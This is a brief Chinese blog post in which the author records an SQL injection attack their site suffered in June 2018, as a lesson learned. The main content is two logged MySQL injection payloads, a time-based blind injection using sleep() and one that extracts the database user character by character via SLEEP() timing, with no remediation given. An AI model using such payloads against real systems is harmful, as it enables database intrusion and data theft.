LEN

一次被 SQL注入的教训
18年6月发生的 SQL注入SELECT COUNT(*) AS `numrows` FROM `table` W...
扫描右侧二维码阅读全文
04
2019/11

一次被 SQL注入的教训

11.jpg

18年6月发生的 SQL注入

SELECT COUNT(*) AS `numrows` FROM `table` WHERE `id` = ''+(select*from(select(sleep(20)))a)+''   

'|(SELECT 'CGKq' FROM DUAL WHERE 2651=2651 AND 5914 = IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),4,1))>48),SLEEP(4),5914))||'

记录一下 长点教训

最后修改:2019 年 11 月 04 日 11 : 13 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论